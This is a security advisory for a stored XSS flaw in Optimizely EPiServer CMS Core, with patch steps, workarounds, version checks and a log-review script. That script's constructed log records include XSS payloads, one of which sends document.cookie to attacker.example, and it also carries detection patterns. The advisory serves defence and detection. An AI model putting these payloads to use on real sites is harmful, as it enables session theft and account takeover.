CVE-2025-22388
📋 TL;DR
A stored cross-site scripting (XSS) vulnerability in Optimizely EPiServer CMS Core (the EPiServer.CMS.Core package) allows an attacker with content-editing access to inject JavaScript through content fields, links and file uploads. All installations on versions before 12.22.0 are affected; the payload executes in the browser of anyone who views the injected content, including administrators.
💻 Affected Systems
- Optimizely EPiServer CMS Core
📦 What is this software?
Optimizely CMS (formerly Episerver CMS) is a .NET content management system by Optimizely. The affected component is the EPiServer.CMS.Core NuGet package.
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal session cookies, redirect users to malicious sites, perform actions as authenticated users, or compromise administrator accounts leading to full system takeover.
Likely Case
Attackers inject malicious scripts that steal user credentials or session tokens when users view compromised content pages.
If Mitigated
Output encoding and an allow-list HTML sanitizer on the affected fields reduce the risk substantially, but they are compensating controls: the vulnerable code remains until 12.22.0 or later is deployed, and content stored before the controls were added must still be reviewed.
🎯 Exploit Status
Requires an authenticated account with content-editing rights. Once such access is obtained, exploitation is straightforward: the payload is saved as ordinary content and runs in the browser of every viewer, with no further interaction needed from the attacker.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 12.22.0
Vendor Advisory: https://support.optimizely.com/hc/en-us/articles/33182047260557-Content-Management-System-CMS-Security-Advisory-CMS-2025-01
Restart Required: Yes
Instructions:
1. Backup your CMS installation and database.
2. Update EPiServer.CMS.Core to version 12.22.0 or later via the NuGet package manager.
3. Restart the application pool or web server.
4. Test all content editing functionality.
🔧 Temporary Workarounds
Input Validation Filter
Implement server-side validation that sanitizes HTML submitted through content editing, link and file upload fields, using an allow-list of permitted tags and attributes rather than a block-list of known-bad strings (case variants, event-handler attributes and javascript: URLs slip past block-lists).
In ASP.NET this can be done in a custom validation filter on the relevant controllers. The AntiXSS library often suggested for this is a .NET Framework library; CMS 12 runs on .NET 5 and later, where System.Text.Encodings.Web provides the output encoders and stored HTML needs a maintained sanitizer library.
Content Security Policy
Implement a strict Content Security Policy to limit script execution on the public site.
Add a Content-Security-Policy header with a script-src 'self' directive and no 'unsafe-inline', so that injected inline scripts, event-handler attributes and javascript: URLs are blocked. Caveats: this is a browser-side control that limits impact rather than removing the flaw; editing interfaces of this kind commonly rely on inline scripts, so roll the policy out in Content-Security-Policy-Report-Only mode first and scope it to the public site.
🧯 If You Can't Patch
- Implement web application firewall (WAF) rules to block XSS payloads in content submissions; treat this as a speed bump only, since encoded and attribute-based payloads routinely bypass signature rules
- Disable or restrict content editing permissions to trusted administrators only, and review editor accounts for unexpected logins
- Search existing content for already-stored payloads (script tags, event-handler attributes, javascript: links); a WAF rule or permission change does not remove what is already in the database
🔍 How to Verify
Check if Vulnerable:
Check the version of EPiServer.CMS.Core referenced by your project: in packages.config for older projects, or the PackageReference in the .csproj for SDK-style projects. Any version below 12.22.0 is vulnerable. Compare versions numerically, not as strings (12.9.0 is older than 12.22.0).
Check Version:
Check packages.config for <package id="EPiServer.CMS.Core" version="X.X.X" /> or the .csproj for <PackageReference Include="EPiServer.CMS.Core" Version="X.X.X" />. From the NuGet Package Manager Console:
Get-Package -ProjectName YourProjectName | Where-Object {$_.Id -eq 'EPiServer.CMS.Core'}
or from a shell with the .NET SDK installed, in the project directory:
dotnet list package
Verify Fix Applied:
After updating, confirm that the resolved EPiServer.CMS.Core version is 12.22.0 or higher (the resolved version, not only the requested one, in case a lower version is pinned elsewhere), then test the content editing, link and file upload fields with XSS payloads in a non-production environment and confirm the payloads are neutralised.
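The version checks above, as an added example written for this page (not Optimizely's own tooling): a Python script that parses both reference formats named above, compares versions numerically, and treats pre-release builds of 12.22.0 as still vulnerable. The sample project files embedded in it are constructed, and the handling of version ranges by their lower bound is a simplification.

```python
"""Flag a .NET project that references EPiServer.CMS.Core below the fixed version 12.22.0.

Added example, not Optimizely code. Parses packages.config and .csproj PackageReference
entries and compares versions numerically, so 12.9.0 is correctly treated as older than 12.22.0.
"""
import re
import sys
import xml.etree.ElementTree as ET
from typing import Optional, Tuple

PACKAGE_ID = "EPiServer.CMS.Core"
FIXED_VERSION = "12.22.0"

_VERSION_RE = re.compile(r"(\d+(?:\.\d+)*)(?:-([0-9A-Za-z.-]+))?(?:\+.*)?")


def parse_version(text: str) -> Tuple[Tuple[int, ...], int, str]:
    """Turn a NuGet/SemVer version into a sortable key.

    A pre-release (12.22.0-pre0001) must sort below the release it precedes, so the key is
    (numbers, 0 for pre-release / 1 for release, tag). Tags compare as plain strings here.
    """
    m = _VERSION_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    numbers = tuple(int(p) for p in m.group(1).split("."))
    numbers += (0,) * (4 - len(numbers))  # pad so 12.22 == 12.22.0.0
    tag = m.group(2) or ""
    return (numbers, 0 if tag else 1, tag)


def is_vulnerable(version: str) -> bool:
    """True when the referenced version is older than the fix."""
    # A PackageReference may carry a range such as "[12.21.0, 13.0)"; this example
    # judges a range by its lower bound (a simplification).
    lower = version.strip().lstrip("[(").split(",")[0].strip()
    return parse_version(lower) < parse_version(FIXED_VERSION)


def _local(tag: str) -> str:
    """Strip an XML namespace ({ns}Name -> Name); old-style .csproj files carry one."""
    return tag.rsplit("}", 1)[-1]


def find_package_version(xml_text: str) -> Optional[str]:
    """Return the EPiServer.CMS.Core version referenced in a packages.config or .csproj."""
    root = ET.fromstring(xml_text)
    for el in root.iter():
        name = _local(el.tag)
        # packages.config: <package id="EPiServer.CMS.Core" version="12.21.0" />
        if name == "package" and el.get("id", "").lower() == PACKAGE_ID.lower():
            return el.get("version")
        # SDK-style .csproj: <PackageReference Include="..." Version="..." />,
        # or the same with <Version> as a child element
        if name == "PackageReference" and el.get("Include", "").lower() == PACKAGE_ID.lower():
            if el.get("Version"):
                return el.get("Version")
            for child in el:
                if _local(child.tag) == "Version" and child.text:
                    return child.text.strip()
    return None


def check(xml_text: str) -> Optional[bool]:
    """None if the package is not referenced, otherwise whether the reference is vulnerable."""
    version = find_package_version(xml_text)
    return None if version is None else is_vulnerable(version)


# Constructed sample project files (not taken from any real deployment).
CSPROJ_VULNERABLE = """<Project Sdk="Microsoft.NET.Sdk.Web">
  <ItemGroup>
    <PackageReference Include="EPiServer.CMS.Core" Version="12.21.0" />
  </ItemGroup>
</Project>"""

CSPROJ_CHILD_VERSION = """<Project Sdk="Microsoft.NET.Sdk.Web">
  <ItemGroup>
    <PackageReference Include="EPiServer.CMS.Core">
      <Version>12.22.0</Version>
    </PackageReference>
  </ItemGroup>
</Project>"""

PACKAGES_CONFIG_FIXED = """<?xml version="1.0" encoding="utf-8"?>
<packages>
  <package id="EPiServer.CMS.Core" version="12.22.0" targetFramework="net6.0" />
</packages>"""


if __name__ == "__main__":
    # Usage: python check_cms_core.py path/to/project.csproj [more files...]
    # With no arguments the constructed samples are checked instead.
    paths = sys.argv[1:]
    for path in paths:
        with open(path, encoding="utf-8-sig") as fh:
            result = check(fh.read())
        status = {None: "not referenced", True: "VULNERABLE", False: "fixed"}[result]
        print(f"{path}: {PACKAGE_ID} {status}")
    if not paths:
        for label, text in [("csproj", CSPROJ_VULNERABLE), ("packages.config", PACKAGES_CONFIG_FIXED)]:
            print(f"sample {label}: vulnerable={check(text)}")
```

Run it against every .csproj and packages.config in the solution; a transitive reference pulled in by another Optimizely package will not appear in these files, so pair it with the `dotnet list package` output above for the resolved version.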
📡 Detection & Monitoring
Log Indicators:
- Unusual content updates with script tags or JavaScript code
- Multiple failed content validation attempts
- Administrator account performing unexpected content edits
Network Indicators:
- HTTP requests containing script tags in POST data to content editing endpoints
- Unusual outbound connections from users' browsers (not from the CMS server) to unknown external domains immediately after viewing CMS pages; stored XSS runs client-side, so exfiltration traffic originates from viewers and shows up in proxy logs or CSP violation reports
SIEM Query:
source="web_server" AND (uri_path="/episerver/cms/edit" OR uri_path="/episerver/cms/content") AND (request_body CONTAINS "<script>" OR request_body CONTAINS "javascript:")
Caveats: confirm the endpoint paths against the edit requests observed in your own logs; literal CONTAINS matching is case-sensitive and misses URL- or entity-encoded payloads and event-handler attributes (onerror=, onload=), so decode the body before matching and add those patterns; and editors legitimately post HTML to these endpoints, so baseline normal content before alerting on it.
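The log indicators and SIEM query above, as an added example that is not from the page's source or from Optimizely: a Python review of constructed web-server records showing what the literal CONTAINS clauses catch and what they miss once payloads are case-varied, URL-encoded, entity-encoded or carried in event-handler attributes. The endpoint paths are the ones the query names; the JSON record layout is assumed, and every record is constructed.

```python
"""Review web-server log records for stored-XSS payloads posted to CMS editing endpoints.

Added example, not Optimizely code. Endpoint paths come from the page's SIEM query;
the JSON record layout is assumed and the records below are constructed.
"""
import html
import json
import re
import urllib.parse
from typing import Dict, List

# Paths taken from the page's SIEM query; adjust to what your own logs show.
EDIT_PATHS = ("/episerver/cms/edit", "/episerver/cms/content")

# What the literal SIEM query looks for.
NAIVE_MARKERS = ("<script>", "javascript:")

# Indicators checked after decoding. The event-handler rule is deliberately broad
# (it also fires on a field literally named "one=") and needs tuning on real traffic.
XSS_PATTERNS = {
    "script tag": re.compile(r"<\s*script\b", re.I),
    "event handler attribute": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript: URL": re.compile(r"javascript\s*:", re.I),
    "active embed": re.compile(r"<\s*(?:iframe|object|embed|svg|math)\b", re.I),
}


def normalise(body: str) -> str:
    """Peel off the encodings used to slip past literal matching."""
    text = body
    for _ in range(2):  # handle double URL-encoding
        text = urllib.parse.unquote_plus(text)
    text = html.unescape(text)  # &#106;avascript: -> javascript:
    return text.replace("\x00", "")


def naive_match(body: str) -> bool:
    """Case-sensitive literal match on the raw body, as the CONTAINS clauses behave."""
    return any(marker in body for marker in NAIVE_MARKERS)


def xss_indicators(body: str) -> List[str]:
    """Names of the indicator rules that fire on the decoded body."""
    text = normalise(body)
    return [name for name, pattern in XSS_PATTERNS.items() if pattern.search(text)]


def review_log(lines: List[str]) -> List[Dict]:
    """One finding per POST to an editing endpoint whose body carries an indicator."""
    findings = []
    for line in lines:
        rec = json.loads(line)
        if rec.get("method") != "POST" or not rec.get("uri_path", "").startswith(EDIT_PATHS):
            continue
        body = rec.get("request_body", "")
        indicators = xss_indicators(body)
        if indicators:
            findings.append({
                "ts": rec.get("ts"),
                "user": rec.get("user"),
                "uri_path": rec["uri_path"],
                "indicators": indicators,
                "naive_would_match": naive_match(body),
            })
    return findings


def _rec(ts: str, user: str, method: str, path: str, body: str) -> str:
    return json.dumps({"ts": ts, "user": user, "method": method, "uri_path": path, "request_body": body})


# Constructed log records (not real traffic); attacker.example is a reserved example domain.
LOG_LINES = [
    _rec("2025-01-10T09:00:01Z", "editor1", "GET", "/episerver/cms/edit", ""),
    _rec("2025-01-10T09:00:05Z", "editor1", "POST", "/episerver/cms/content",
         "mainBody=<p>Welcome to our site</p>"),                       # benign editor HTML
    _rec("2025-01-10T09:01:10Z", "editor2", "POST", "/episerver/cms/content",
         "mainBody=<script>alert(1)</script>"),                         # the only one CONTAINS catches
    _rec("2025-01-10T09:02:11Z", "editor2", "POST", "/episerver/cms/content",
         "mainBody=<ScRiPt>new Image().src='https://attacker.example/?c='+document.cookie</ScRiPt>"),
    _rec("2025-01-10T09:03:12Z", "editor2", "POST", "/episerver/cms/edit",
         "mainBody=<img src=x onerror=alert(document.domain)>"),        # no script tag at all
    _rec("2025-01-10T09:04:13Z", "editor2", "POST", "/episerver/cms/content",
         "mainBody=%3Cscript%3Ealert(1)%3C%2Fscript%3E"),               # URL-encoded
    _rec("2025-01-10T09:05:14Z", "editor2", "POST", "/episerver/cms/content",
         'linkUrl=<a href="&#106;avascript:alert(1)">Click</a>'),      # entity-encoded javascript:
    _rec("2025-01-10T09:06:15Z", "editor2", "POST", "/search",
         "q=<script>alert(1)</script>"),                                # not an editing endpoint
]


if __name__ == "__main__":
    for finding in review_log(LOG_LINES):
        print(json.dumps(finding))
```

Of the five malicious records posted to editing endpoints, the literal query flags only the first; the remaining four are caught only after decoding and matching on tags, attributes and URL schemes. Feed real request bodies through the same normalisation before writing the production SIEM rule, and expect to tune the event-handler pattern against legitimate editor traffic.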